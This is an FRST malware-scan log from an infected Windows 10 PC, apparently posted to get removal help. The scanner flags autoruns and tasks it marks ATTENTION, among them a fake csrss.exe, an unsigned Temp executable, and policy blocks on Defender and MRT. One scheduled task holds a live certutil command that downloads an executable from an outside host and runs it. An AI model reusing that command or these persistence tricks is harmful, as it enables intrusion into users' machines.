Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version: 24-11-2019 Ran by SR (administrator) on DESKTOP-A0OS1Q6 (Gigabyte Technology Co., Ltd. To be filled by O.E.M.) (24-11-2019 19:50:32) Running from D:\Users\SR\Downloads Loaded Profiles: SR (Available Profiles: SR & Administrator) Platform: Windows 10 Pro Version 1803 17134.345 (X64) Language: English (United States) Default browser: FF Boot Mode: Normal Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/ ==================== Processes (Whitelisted) ================= (If an entry is included in the fixlist, the process will be closed. The file will not be moved.) ( ) [File not signed] C:\Users\SR\AppData\Local\Temp\is-2HG9K.tmp\Guitar.exe () [File not signed] C:\Program Files (x86)\DSDCS\InputMapper HidGuardian\InputMapperCerberusWhitelister.exe () [File not signed] C:\Users\SR\AppData\Local\Temp\is-FML3U.tmp\Guitar.tmp (Adobe Inc. -> Adobe Systems, Incorporated) C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGMService.exe (Adobe Inc. -> Adobe Systems, Incorporated) C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGSService.exe (Adobe Systems Incorporated -> Adobe Systems Incorporated) C:\Program Files (x86)\Common Files\Adobe\Adobe Desktop Common\ElevationManager\AdobeUpdateService.exe (Apple Inc. -> Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe (Apple Inc. -> Apple Inc.) C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe (Brio) [File not signed] C:\Program Files\FolderSize\FolderSizeSvc.exe (Creative Labs Inc -> Creative Technology Ltd) C:\Windows\SysWOW64\CtHelper.exe (Dropbox, Inc -> Dropbox, Inc.) C:\Program Files (x86)\Dropbox\Client\Dropbox.exe (Dropbox, Inc -> Dropbox, Inc.) C:\Program Files (x86)\Dropbox\Client\Dropbox.exe (Dropbox, Inc -> Dropbox, Inc.) C:\Program Files (x86)\Dropbox\Client\Dropbox.exe (Dropbox, Inc -> Dropbox, Inc.) C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe (Dropbox, Inc -> Dropbox, Inc.) C:\Windows\System32\DbxSvc.exe (Dropbox, Inc -> The Qt Company Ltd.) C:\Program Files (x86)\Dropbox\Client\85.4.155\QtWebEngineProcess.exe (Dropbox, Inc -> The Qt Company Ltd.) C:\Program Files (x86)\Dropbox\Client\85.4.155\QtWebEngineProcess.exe (Dropbox, Inc -> The Qt Company Ltd.) C:\Program Files (x86)\Dropbox\Client\85.4.155\QtWebEngineProcess.exe (IDRIX -> IDRIX) C:\Program Files\VeraCrypt\VeraCrypt.exe (Invincea, Inc. -> Sandboxie Holdings, LLC) C:\Program Files\Sandboxie\SbieCtrl.exe (Invincea, Inc. -> Sandboxie Holdings, LLC) C:\Program Files\Sandboxie\SbieSvc.exe (Invincea, Inc. -> Sandboxie Holdings, LLC) C:\Program Files\Sandboxie\SbieSvc.exe (Logitech Inc -> Logitech) C:\ProgramData\Logishrd\LogiOptions\Software\Current\LogiOverlay.exe (Logitech Inc -> Logitech, Inc.) C:\Program Files\Common Files\Logishrd\KHAL3\KHALMNPR.exe (Logitech Inc -> Logitech, Inc.) C:\Program Files\Logitech\LogiOptions\LogiOptions.exe (Logitech Inc -> Logitech, Inc.) C:\Program Files\Logitech\SetPointP\SetPoint.exe (Logitech Inc -> Logitech, Inc.) C:\ProgramData\Logishrd\LogiOptions\Software\Current\LogiOptionsMgr.exe (Microsoft Corporation -> Microsoft Corporation) C:\Program Files (x86)\Common Files\microsoft shared\Phone Tools\CoreCon\11.0\bin\IpOverUsbSvc.exe (Microsoft Corporation -> Microsoft Corporation) C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe (Microsoft Corporation -> Microsoft Corporation) C:\Program Files\Microsoft SQL Server\90\Shared\sqlwriter.exe (Microsoft Windows -> Microsoft Corporation) C:\Program Files\Windows Defender\MSASCuiL.exe (Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\dllhost.exe (Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\dllhost.exe (Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\dllhost.exe (Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\rundll32.exe (Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\smartscreen.exe (Microsoft Windows Publisher -> Microsoft Corporation) C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.1910.4-0\MsMpEng.exe (Microsoft Windows Publisher -> Microsoft Corporation) C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.1910.4-0\NisSrv.exe (Mozilla Corporation -> Mozilla Corporation) C:\Program Files\Mozilla Firefox\firefox.exe (Mozilla Corporation -> Mozilla Corporation) C:\Program Files\Mozilla Firefox\firefox.exe (Mozilla Corporation -> Mozilla Corporation) C:\Program Files\Mozilla Firefox\firefox.exe (Mozilla Corporation -> Mozilla Corporation) C:\Program Files\Mozilla Firefox\firefox.exe (Mozilla Corporation -> Mozilla Corporation) C:\Program Files\Mozilla Firefox\firefox.exe (Mozilla Corporation -> Mozilla Corporation) C:\Program Files\Mozilla Firefox\firefox.exe (NVIDIA Corporation -> Node.js) C:\Program Files (x86)\NVIDIA Corporation\NvNode\NVIDIA Web Helper.exe (NVIDIA Corporation -> NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display.NvContainer\NVDisplay.Container.exe (NVIDIA Corporation -> NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display.NvContainer\NVDisplay.Container.exe (NVIDIA Corporation -> NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe (NVIDIA Corporation -> NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe (NVIDIA Corporation -> NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NvTelemetry\NvTelemetryContainer.exe (Open Source Developer, Phillip Gibbons -> Highresolution Enterprises) C:\Program Files\Highresolution Enterprises\X-Mouse Button Control\XMouseButtonControl.exe (Oracle America, Inc. -> Oracle Corporation) C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe (PACE Anti-Piracy, Inc. -> PACE Anti-Piracy, Inc.) C:\Program Files (x86)\Common Files\PACE\Services\LicenseServices\LDSvc.exe (Polenter - Pawel Idzikowski -> Polenter - Software Solutions) C:\Program Files (x86)\Desktop-Reminder 2\DesktopReminder2.exe (Reprise Software Inc.) [File not signed] C:\Program Files (x86)\The Foundry\LicensingTools7.0\bin\RLM\rlm.foundry.exe (Reprise Software Inc.) [File not signed] C:\Program Files (x86)\The Foundry\LicensingTools7.0\bin\RLM\rlm.foundry.exe (TeamViewer GmbH -> TeamViewer GmbH) C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe (WinAbility Software Corporation -> WinAbility® Software Corporation) C:\Program Files\IconShepherd\ISEXE64.exe ==================== Registry (Whitelisted) =================== (If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.) HKLM\...\Run: [SecurityHealth] => C:\Program Files\Windows Defender\MSASCuiL.exe [638872 2018-04-12] (Microsoft Windows -> Microsoft Corporation) HKLM\...\Run: [AdobeAAMUpdater-1.0] => C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe [508128 2016-07-01] (Adobe Systems Incorporated -> Adobe Systems Incorporated) HKLM\...\Run: [XMouseButtonControl] => C:\Program Files\Highresolution Enterprises\X-Mouse Button Control\XMouseButtonControl.exe [1605856 2019-08-18] (Open Source Developer, Phillip Gibbons -> Highresolution Enterprises) HKLM\...\Run: [AdobeGCInvoker-1.0] => C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGCInvokerUtility.exe [2872400 2019-10-08] (Adobe Inc. -> Adobe Systems, Incorporated) HKLM\...\Run: [Logitech Download Assistant] => C:\Windows\System32\LogiLDA.dll [3933496 2012-09-20] (Logitech -> Logitech, Inc.) HKLM\...\Run: [AsioReg] => REGSVR32.EXE /S CTASIO.DLL* HKLM\...\Run: [LogiOptions] => C:\Program Files\Logitech\LogiOptions\LogiOptions.exe [2176648 2018-06-18] (Logitech Inc -> Logitech, Inc.) HKLM\...\Run: [iTunesHelper] => C:\Program Files\iTunes\iTunesHelper.exe [302904 2019-01-18] (Apple Inc. -> Apple Inc.) HKLM\...\Run: [EvtMgr6] => C:\Program Files\Logitech\SetPointP\SetPoint.exe [3136136 2019-01-30] (Logitech Inc -> Logitech, Inc.) HKLM-x32\...\Run: [Dropbox] => C:\Program Files (x86)\Dropbox\Client\Dropbox.exe [6260544 2019-11-14] (Dropbox, Inc -> Dropbox, Inc.) HKLM-x32\...\Run: [AsioThk32Reg] => REGSVR32.EXE /S CTASIO.DLL HKLM-x32\...\Run: [CTHelper] => C:\Windows\SysWOW64\CTHELPER.EXE* [23040 2009-02-23] () [File not signed] HKLM-x32\...\Run: [CTxfiHlp] => C:\Windows\SysWOW64\CTXFIHLP.EXE* [23552 2009-02-23] () [File not signed] HKLM-x32\...\Run: [SunJavaUpdateSched] => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [645648 2019-10-05] (Oracle America, Inc. -> Oracle Corporation) HKLM Group Policy restriction on software: %systemroot%\system32\mrt.exe <==== ATTENTION HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Restriction <==== ATTENTION HKU\S-1-5-21-3967059023-4107875624-2872843465-1001\ DisallowedCertificates: 7D4EAFF45C5D8A3E9AB24486D12F4B4F7F4DBB60 (U) HKU\S-1-5-19\...\RunOnce: [WAB Migrate] => C:\Program Files\Windows Mail\wab.exe [518144 2018-04-12] (Microsoft Windows -> Microsoft Corporation) HKU\S-1-5-20\...\RunOnce: [WAB Migrate] => C:\Program Files\Windows Mail\wab.exe [518144 2018-04-12] (Microsoft Windows -> Microsoft Corporation) HKU\S-1-5-21-3967059023-4107875624-2872843465-1001\...\Run: [Steam] => C:\Program Files (x86)\Steam\steam.exe [3199776 2018-04-03] (Valve -> Valve Corporation) HKU\S-1-5-21-3967059023-4107875624-2872843465-1001\...\Run: [DesktopReminder2ByPolenter] => C:\Program Files (x86)\Desktop-Reminder 2\DesktopReminder2.exe [3164048 2017-06-21] (Polenter - Pawel Idzikowski -> Polenter - Software Solutions) HKU\S-1-5-21-3967059023-4107875624-2872843465-1001\...\Run: [SandboxieControl] => C:\Program Files\Sandboxie\SbieCtrl.exe [3682968 2019-04-22] (Invincea, Inc. -> Sandboxie Holdings, LLC) HKU\S-1-5-21-3967059023-4107875624-2872843465-1001\...\Run: [Viber] => C:\Users\SR\AppData\Local\Viber\Viber.exe [38564936 2019-10-30] (Viber Media S.à r.l. -> Viber Media S.à r.l.) HKU\S-1-5-21-3967059023-4107875624-2872843465-1001\...\Run: [GreenResonance] => C:\WINDOWS\rss\csrss.exe [3937792 2019-11-24] () [File not signed] <==== ATTENTION HKU\S-1-5-21-3967059023-4107875624-2872843465-1001\...\Run: [7890540] => C:\Users\SR\AppData\Local\Temp\is-2HG9K.tmp\Guitar.exe [877745 2019-11-24] ( ) [File not signed] <==== ATTENTION HKU\S-1-5-21-3967059023-4107875624-2872843465-1001\...\Run: [CloudNet] => C:\Users\SR\AppData\Roaming\EpicNet Inc\CloudNet\cloudnet.exe [683008 2019-11-24] (EpicNet Inc.) [File not signed] <==== ATTENTION HKLM\Software\...\Authentication\Credential Providers: [{AA96996E-48DD-4D31-A94D-8563298A8C2D}] -> C:\WINDOWS\system32\WACP.dll [2016-09-20] (Softomotive Ltd -> ) Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Icon Shepherd.lnk [2019-10-31] ShortcutTarget: Icon Shepherd.lnk -> C:\Program Files\IconShepherd\ISEXE64.exe (WinAbility Software Corporation -> WinAbility® Software Corporation) GroupPolicy: Restriction - Firefox <==== ATTENTION ==================== Scheduled Tasks (Whitelisted) ============ (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.) Task: {0E55825A-221F-4E7A-9416-6D13AA06ABD8} - System32\Tasks\DropboxUpdateTaskMachineUA => C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe [143144 2018-01-03] (Dropbox, Inc -> Dropbox, Inc.) Task: {12152F8B-CD2F-42DE-A539-041A8A936465} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance => C:\ProgramData\Microsoft\Windows Defender\platform\4.18.1910.4-0\MpCmdRun.exe [469928 2019-10-29] (Microsoft Windows Publisher -> Microsoft Corporation) Task: {14324AB2-DEA1-4205-8D09-E4BC117610AE} - System32\Tasks\Microsoft\Office\Office ClickToRun Service Monitor => C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeC2RClient.exe [24668024 2019-11-18] (Microsoft Corporation -> Microsoft Corporation) Task: {15D1F9B6-04A3-4972-A83C-EF0F4BBB8427} - System32\Tasks\NvProfileUpdaterDaily_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\Update Core\NvProfileUpdater64.exe [899056 2019-05-22] (NVIDIA Corporation -> NVIDIA Corporation) Task: {1B9C5A1B-9321-46BB-84C5-DF45191FF376} - System32\Tasks\NvNodeLauncher_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\NvNode\nvnodejslauncher.exe [648504 2019-05-22] (NVIDIA Corporation -> NVIDIA Corporation) Task: {2208EA4A-30D8-45CC-8BDD-7FC3B05195B5} - System32\Tasks\Microsoft\Office\OfficeBackgroundTaskHandlerLogon => C:\Program Files (x86)\Microsoft Office\root\Office16\officebackgroundtaskhandler.exe [1374008 2019-11-21] (Microsoft Corporation -> Microsoft Corporation) Task: {42596E64-0421-415A-9C21-4EC99F971F53} - System32\Tasks\NvTmRep_CrashReport4_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NvBackend\NvTmRep.exe [1130296 2019-05-22] (NVIDIA Corporation -> NVIDIA Corporation) Task: {42CF4929-54EE-42D2-B729-F538516C85C2} - System32\Tasks\JumpingBytes\PureSyncVSS => C:\Program Files (x86)\Jumping Bytes\PureSync\PureSyncVSSStart.exe [35656 2016-06-16] (Jumping Bytes (Christoph Guentner) -> Jumping Bytes) Task: {66B093E3-0989-45FD-B21D-EE39713B7201} - System32\Tasks\KMSAutoNet => C:\ProgramData\KMSAutoS\KMSAuto Net.exe Task: {78A0CAD1-8991-4E6C-966D-4E69097977E8} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Verification => C:\ProgramData\Microsoft\Windows Defender\platform\4.18.1910.4-0\MpCmdRun.exe [469928 2019-10-29] (Microsoft Windows Publisher -> Microsoft Corporation) Task: {7F8AE7BB-B4DE-4B22-9729-1E5E19704D1A} - System32\Tasks\NvTmRep_CrashReport2_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NvBackend\NvTmRep.exe [1130296 2019-05-22] (NVIDIA Corporation -> NVIDIA Corporation) Task: {881D3DFF-B43A-44C2-820D-F54679FAE900} - System32\Tasks\EPSON L130 Series Update {3D66A2C6-B96B-41F2-80E9-2A3BE5BE4140} => C:\WINDOWS\system32\spool\DRIVERS\x64\3\E_YTSN6E.EXE [690536 2013-11-22] (SEIKO EPSON CORPORATION -> SEIKO EPSON CORPORATION) Task: {93894B49-495F-4FF7-A834-F07A572C2C25} - System32\Tasks\Microsoft\Office\OfficeBackgroundTaskHandlerRegistration => C:\Program Files (x86)\Microsoft Office\root\Office16\officebackgroundtaskhandler.exe [1374008 2019-11-21] (Microsoft Corporation -> Microsoft Corporation) Task: {950BA929-9185-474B-B254-40BA3B8E3A1B} - System32\Tasks\Microsoft\Office\Office Feature Updates Logon => C:\Program Files (x86)\Microsoft Office\root\Office16\sdxhelper.exe [112976 2019-11-21] (Microsoft Corporation -> Microsoft Corporation) Task: {962642C0-4430-4032-92EE-908F3A5F3E52} - System32\Tasks\ExclusiveTool => C:\Program Files (x86)\DSDCS\InputMapper\ExclusiveModeTool.exe [19968 2016-10-04] (InputMapper) [File not signed] Task: {99C2988F-4978-44CF-9C99-C8698A7E4DD0} - System32\Tasks\Microsoft\Office\Office Automatic Updates 2.0 => C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeC2RClient.exe [24668024 2019-11-18] (Microsoft Corporation -> Microsoft Corporation) Task: {9FAB49BF-9A8A-43A8-A5BF-493EE72EF726} - System32\Tasks\Apple\AppleSoftwareUpdate => C:\Program Files (x86)\Apple Software Update\SoftwareUpdate.exe [616320 2018-01-08] (Apple Inc. -> Apple Inc.) Task: {A197B1E1-5017-44E1-8786-700A5A077A97} - System32\Tasks\Microsoft\Office\Office Feature Updates => C:\Program Files (x86)\Microsoft Office\root\Office16\sdxhelper.exe [112976 2019-11-21] (Microsoft Corporation -> Microsoft Corporation) Task: {A2CB4A3E-AFDC-43FA-98BA-0A92F7E5DABE} - System32\Tasks\NvProfileUpdaterOnLogon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\Update Core\NvProfileUpdater64.exe [899056 2019-05-22] (NVIDIA Corporation -> NVIDIA Corporation) Task: {A809944B-8D1B-4F63-BB06-E2CD920F61A2} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentLogOn2016 => C:\Program Files (x86)\Microsoft Office\root\Office16\msoia.exe [4321688 2019-11-13] (Microsoft Corporation -> Microsoft Corporation) Task: {AD74C57C-54F0-4805-B7A0-CB5A9FA03223} - System32\Tasks\AdobeGCInvoker-1.0 => C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGCInvokerUtility.exe [2872400 2019-10-08] (Adobe Inc. -> Adobe Systems, Incorporated) Task: {B264C95D-A9B6-4D69-9B94-FB67D6DB757E} - System32\Tasks\DropboxUpdateTaskMachineCore => C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe [143144 2018-01-03] (Dropbox, Inc -> Dropbox, Inc.) Task: {B69A753B-777A-4C1E-AA9D-1033C77839DE} - System32\Tasks\CreateExplorerShellUnelevatedTask => C:\WINDOWS\explorer.exe /NOUACCHECK Task: {B6C27676-7B71-492F-BB86-892E15752F97} - System32\Tasks\csrss => C:\WINDOWS\rss\csrss.exe [3937792 2019-11-24] () [File not signed] <==== ATTENTION Task: {C68E190A-5D0C-40B1-895A-9522150D9369} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan => C:\ProgramData\Microsoft\Windows Defender\platform\4.18.1910.4-0\MpCmdRun.exe [469928 2019-10-29] (Microsoft Windows Publisher -> Microsoft Corporation) Task: {C789D50A-A2A0-405F-B279-A59DBA0D126E} - System32\Tasks\ScheduledUpdate => cmd.exe /C certutil.exe -urlcache -split -f hxxp://tfortytimes.com/app/app.exe C:\Users\SR\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\SR\AppData\Local\Temp\csrss\scheduled.exe /31340 <==== ATTENTION Task: {CCC37DAD-9377-4ED5-80DB-F21C8D60E2E6} - System32\Tasks\NvBatteryBoostCheckOnLogon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe [782136 2019-02-27] (NVIDIA Corporation -> NVIDIA Corporation) Task: {D34CA7D5-150E-4A42-9C1F-D72B477043A6} - System32\Tasks\NvTmRep_CrashReport3_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NvBackend\NvTmRep.exe [1130296 2019-05-22] (NVIDIA Corporation -> NVIDIA Corporation) Task: {DC559262-3918-4E5A-B027-44ED71265B49} - System32\Tasks\JumpingBytes\PureSyncExit => C:\Program Files (x86)\Jumping Bytes\PureSync\PureSyncAdmin.exe [105808 2018-11-12] (Jumping Bytes (Christoph Guentner) -> Jumping Bytes) Task: {E02831A3-E4D2-410D-9AAC-0268EE1483DF} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Cleanup => C:\ProgramData\Microsoft\Windows Defender\platform\4.18.1910.4-0\MpCmdRun.exe [469928 2019-10-29] (Microsoft Windows Publisher -> Microsoft Corporation) Task: {F1C3AFE7-5B89-4B71-8D62-12804C3764B1} - System32\Tasks\NvTmRep_CrashReport1_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NvBackend\NvTmRep.exe [1130296 2019-05-22] (NVIDIA Corporation -> NVIDIA Corporation) Task: {F7413A74-A9B1-4E6A-91D4-0570477CA0ED} - System32\Tasks\NVIDIA GeForce Experience SelfUpdate_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NVIDIA GeForce Experience\NVIDIA GeForce Experience.exe [3787304 2019-05-23] (NVIDIA Corporation -> NVIDIA Corporation) Task: {F9DCD18B-6730-49E0-8339-A8013E910822} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentFallBack2016 => C:\Program Files (x86)\Microsoft Office\root\Office16\msoia.exe [4321688 2019-11-13] (Microsoft Corporation -> Microsoft Corporation) Task: {FEF2A145-6CB7-48B3-827C-4FFCF30E20F1} - System32\Tasks\NvDriverUpdateCheckDaily_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe [782136 2019-02-27] (NVIDIA Corporation -> NVIDIA Corporation) (If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.) Task: C:\Windows\Tasks\DropboxUpdateTaskMachineCore.job => C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe Task: C:\Windows\Tasks\DropboxUpdateTaskMachineUA.job => C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe Task: C:\Windows\Tasks\EPSON L130 Series Update {3D66A2C6-B96B-41F2-80E9-2A3BE5BE4140}.job => C:\WINDOWS\system32\spool\DRIVERS\x64\3\E_YTSN6E.EXE:/EXE:{3D66A2C6-B96B-41F2-80E9-2A3BE5BE4140} /F:UpdateWORKGROUP\DESKTOP-A0OS1Q6$ĊSearches for EPSON software updates, and notifies you when updates are available.If this task is disabled or stopped, your EPSON software will not be automatically kept up to date.Thi ==================== Internet (Whitelisted) ==================== (If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.) ProxyServer: [S-1-5-21-3967059023-4107875624-2872843465-1001] => http=127.0.0.1:8888; Hosts: There are more than one entry in Hosts. See Hosts section of Addition.txt Tcpip\Parameters: [DhcpNameServer] 1.1.1.1 1.0.0.1 Tcpip\..\Interfaces\{2a8e95f9-250a-4cdc-8d08-f661e3f2a913}: [DhcpNameServer] 1.1.1.1 1.0.0.1 Internet Explorer: ================== SearchScopes: HKLM -> DefaultScope value is missing BHO: Skype for Business Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files (x86)\Microsoft Office\root\VFS\ProgramFilesX64\Microsoft Office\Office16\OCHelper.dll [2019-11-13] (Microsoft Corporation -> Microsoft Corporation) BHO: Java(tm) Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files\Java\jre1.8.0_231\bin\ssv.dll [2019-10-19] (Oracle America, Inc. -> Oracle Corporation) BHO: Logitech SetPoint -> {AF949550-9094-4807-95EC-D1C317803333} -> C:\Program Files\Logitech\SetPointP\SetPointSmooth.dll [2019-01-30] (Logitech Inc -> Logitech, Inc.) BHO: Java(tm) Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files\Java\jre1.8.0_231\bin\jp2ssv.dll [2019-10-19] (Oracle America, Inc. -> Oracle Corporation) BHO-x32: Logitech SetPoint -> {AF949550-9094-4807-95EC-D1C317803333} -> C:\Program Files\Logitech\SetPointP\32-bit\SetPointSmooth.dll [2019-01-30] (Logitech Inc -> Logitech, Inc.) Handler-x32: mso-minsb-roaming.16 - {83C25742-A9F7-49FB-9138-434302C88D07} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2019-11-13] (Microsoft Corporation -> Microsoft Corporation) Handler-x32: mso-minsb.16 - {42089D2D-912D-4018-9087-2B87803E93FB} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2019-11-13] (Microsoft Corporation -> Microsoft Corporation) Handler-x32: osf-roaming.16 - {42089D2D-912D-4018-9087-2B87803E93FB} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2019-11-13] (Microsoft Corporation -> Microsoft Corporation) Handler-x32: osf.16 - {5504BE45-A83B-4808-900A-3A5C36E7F77A} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2019-11-13] (Microsoft Corporation -> Microsoft Corporation) FireFox: ======== FF DefaultProfile: qyonbq05.default-1454591260015 FF ProfilePath: C:\Users\SR\AppData\Roaming\Mozilla\Firefox\Profiles\dho1fb01.default-release [2019-11-24] FF Notifications: Mozilla\Firefox\Profiles\dho1fb01.default-release -> hxxps://mail-notification.info FF Extension: (DuckDuckGo Privacy Essentials) - C:\Users\SR\AppData\Roaming\Mozilla\Firefox\Profiles\dho1fb01.default-release\Extensions\jid1-ZAdIEUB7XOzOJw@jetpack.xpi [2019-10-27] FF Extension: (Skip Redirect) - C:\Users\SR\AppData\Roaming\Mozilla\Firefox\Profiles\dho1fb01.default-release\Extensions\skipredirect@sblask.xpi [2019-11-15] FF Extension: (Adblocker Lite) - C:\Users\SR\AppData\Roaming\Mozilla\Firefox\Profiles\dho1fb01.default-release\Extensions\{3596f810-bf50-47e2-b54a-2128ebdc5179}.xpi [2019-06-05] FF ProfilePath: C:\Users\SR\AppData\Roaming\Mozilla\Firefox\Profiles\qyonbq05.default-1454591260015 [2019-11-24] FF DownloadDir: D:\Users\SR\Downloads FF NewTab: Mozilla\Firefox\Profiles\qyonbq05.default-1454591260015 -> about:newtab FF NetworkProxy: Mozilla\Firefox\Profiles\qyonbq05.default-1454591260015 -> type", 0 FF Notifications: Mozilla\Firefox\Profiles\qyonbq05.default-1454591260015 -> hxxps://mail-notification.info FF Extension: (Disconnect) - C:\Users\SR\AppData\Roaming\Mozilla\Firefox\Profiles\qyonbq05.default-1454591260015\Extensions\2.0@disconnect.me.xpi [2019-04-15] FF Extension: (Grammarly for Firefox) - C:\Users\SR\AppData\Roaming\Mozilla\Firefox\Profiles\qyonbq05.default-1454591260015\Extensions\87677a2c52b84ad3a151a4a72f5bd3c4@jetpack.xpi [2019-02-04] FF Extension: (AdGuard AdBlocker) - C:\Users\SR\AppData\Roaming\Mozilla\Firefox\Profiles\qyonbq05.default-1454591260015\Extensions\adguardadblocker@adguard.com.xpi [2019-04-17] FF Extension: (Block Site) - C:\Users\SR\AppData\Roaming\Mozilla\Firefox\Profiles\qyonbq05.default-1454591260015\Extensions\{54e2eb33-18eb-46ad-a4e4-1329c29f6e17}.xpi [2019-05-01] FF Extension: (Adblock Plus - free ad blocker) - C:\Users\SR\AppData\Roaming\Mozilla\Firefox\Profiles\qyonbq05.default-1454591260015\Extensions\{d10d0bf8-f5b5-c8b4-a8b2-2b9879e08c5d}.xpi [2019-04-20] FF Extension: (No Name) - C:\Program Files\Mozilla Firefox\browser\features\{EBA45A79-A229-44D3-A606-3DADEAC6A066}.xpi [2019-08-11] [not signed] FF HKLM-x32\...\Firefox\Extensions: [{F003DA68-8256-4b37-A6C4-350FA04494DF}] - C:\Program Files\Logitech\SetPointP\LogiSmoothFirefoxExt FF Extension: (Logitech SetPoint) - C:\Program Files\Logitech\SetPointP\LogiSmoothFirefoxExt [2019-10-19] [not signed] FF Plugin: @adobe.com/FlashPlayer -> C:\WINDOWS\system32\Macromed\Flash\NPSWF64_32_0_0_223.dll [2019-08-04] (Adobe Inc. -> ) FF Plugin: @itools.hk/npiTools, version=1.0.0 -> C:\Program Files (x86)\ThinkSky\iTools 3\Extensions\npiTools.dll [2017-05-26] (Shenzhen Thinksky Technology Co.,Ltd -> ) FF Plugin: @java.com/DTPlugin,version=11.231.2 -> C:\Program Files\Java\jre1.8.0_231\bin\dtplugin\npDeployJava1.dll [2019-10-19] (Oracle America, Inc. -> Oracle Corporation) FF Plugin: @java.com/JavaPlugin,version=11.231.2 -> C:\Program Files\Java\jre1.8.0_231\bin\plugin2\npjp2.dll [2019-10-19] (Oracle America, Inc. -> Oracle Corporation) FF Plugin: adobe.com/AdobeAAMDetect -> C:\Program Files (x86)\Adobe\Adobe Creative Cloud\Utils\npAdobeAAMDetect64.dll [2016-10-25] (Adobe Systems Incorporated -> Adobe Systems) FF Plugin-x32: @adobe.com/FlashPlayer -> C:\WINDOWS\SysWOW64\Macromed\Flash\NPSWF32_32_0_0_223.dll [2019-08-04] (Adobe Inc. -> ) FF Plugin-x32: @itools.hk/npiTools, version=1.0.0 -> C:\Program Files (x86)\ThinkSky\iTools 3\Extensions\npiTools.dll [2017-05-26] (Shenzhen Thinksky Technology Co.,Ltd -> ) FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\Program Files (x86)\Microsoft Office\root\Office16\NPSPWRAP.DLL [2019-11-13] (Microsoft Corporation -> Microsoft Corporation) FF Plugin-x32: @nvidia.com/3DVision -> C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dv.dll [2018-05-22] (NVIDIA Corporation -> NVIDIA Corporation) FF Plugin-x32: @nvidia.com/3DVisionStreaming -> C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dvstreaming.dll [2018-05-22] (NVIDIA Corporation -> NVIDIA Corporation) FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.34.11\npGoogleUpdate3.dll [2019-05-15] (Google 